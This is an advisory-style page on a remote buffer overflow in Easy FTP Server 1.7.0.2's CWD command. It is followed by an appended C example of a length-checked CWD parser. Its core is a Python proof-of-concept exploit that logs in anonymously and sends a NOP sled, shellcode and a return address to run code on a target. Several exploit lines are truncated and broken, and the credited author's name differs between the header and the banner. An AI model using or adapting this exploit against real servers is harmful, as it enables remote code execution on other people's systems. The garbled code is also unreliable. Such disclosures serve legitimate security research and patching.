10.46.20 Easy FTP Server 1.7.0.2 Remote BoF
* Other vulnerabilities covered in bid:38262 *

=== Infos ===
Credit: loneferret
Found: 18/02/10
Versions affected <= 1.7.0.2

=== Description ===
Lack of input length checks for the CWD command results in a buffer overflow vulnerability, allowing the execution of arbitrary code by a remote attacker.

=== Workaround ===
Upgrade to the latest version - 1.7.0.12

=== PoC ===
#!/usr/bin/python
import socket, sys

print """
******************************
* Easy FTP Server 1.7.0.2 Remote BoF *
* Discovered by: Jon Butler *
* jonbutler88[at]googlemail[dot]
******************************
"""

if len(sys.argv) != 3:
    print "Usage: ./easyftp.py <Target IP> <Port>"
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

# Calc.exe PoC shellcode - Tested on XP Pro SP3 (Eng)
shellcode = ("\xba\x20\xf0\xfd\x7f\xc7\
"\x33\xC0\x50\x68\x63\x61\x6C\
"\xC7\x93\xC2\x77"
"\xFF\xD1\xEB\xF7")

nopsled = "\x90" * (268 - len(shellcode))
ret = "\x58\xFD\x9A\x00"
payload = nopsled + shellcode + ret # 272 bytes

print "[+] Launching exploit against " + target + "..."
s=socket.socket(socket.AF_
try:
    connect=s.connect((target, port))
    print "[+] Connected!"
except:
    print "[!] Connection failed!"
    sys.exit(0)

s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)

# Send payload...
print "[+] Sending payload..."
s.send('CWD ' + payload + '\r\n')
try:
    s.recv(1024)
    print "[!] Exploit failed..."
except:
    print "[+] Exploited ^_^"
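
The input length check that the Description says is missing, as an added example that is not part of the original advisory and is not Easy FTP Server's own code: a CWD argument parser that validates the length before copying anything. The names `parse_cwd`, `is_cwd`, the status values and the 256-byte `CWD_PATH_MAX` are assumptions for illustration; the server's real buffer size is not given on the page.

```c
#include <stddef.h>
#include <string.h>

/* Assumed buffer size for illustration; the server's real size is not on the page. */
#define CWD_PATH_MAX 256

enum cwd_status { CWD_OK, CWD_NOT_CWD, CWD_EMPTY, CWD_TOO_LONG, CWD_BAD_BYTE };

/* FTP verbs are case-insensitive, so accept "cwd " as well as "CWD ". */
static int is_cwd(const char *l)
{
    return (l[0] | 0x20) == 'c' && (l[1] | 0x20) == 'w' &&
           (l[2] | 0x20) == 'd' && l[3] == ' ';
}

/*
 * Parse one control-channel line of known length into out[CWD_PATH_MAX].
 * The argument length is checked before any byte is copied, so an oversized
 * path is refused instead of being written past the end of the buffer.
 */
enum cwd_status parse_cwd(const char *line, size_t line_len, char *out)
{
    const char *arg;
    size_t arg_len, i;

    if (line_len < 4 || !is_cwd(line))
        return CWD_NOT_CWD;
    arg = line + 4;
    arg_len = line_len - 4;

    /* Drop the CRLF (or bare LF) that terminates the command. */
    while (arg_len > 0 && (arg[arg_len - 1] == '\r' || arg[arg_len - 1] == '\n'))
        arg_len--;
    if (arg_len == 0)
        return CWD_EMPTY;

    /* The length check: the path plus its terminating NUL must fit. */
    if (arg_len >= CWD_PATH_MAX)
        return CWD_TOO_LONG;

    /* Refuse NUL and control bytes; a path name has no use for them. */
    for (i = 0; i < arg_len; i++)
        if ((unsigned char)arg[i] < 0x20 || arg[i] == 0x7f)
            return CWD_BAD_BYTE;

    memcpy(out, arg, arg_len);
    out[arg_len] = '\0';
    return CWD_OK;
}
```

A caller would answer any status other than `CWD_OK` with an FTP error reply (for example 501) and leave the working directory unchanged.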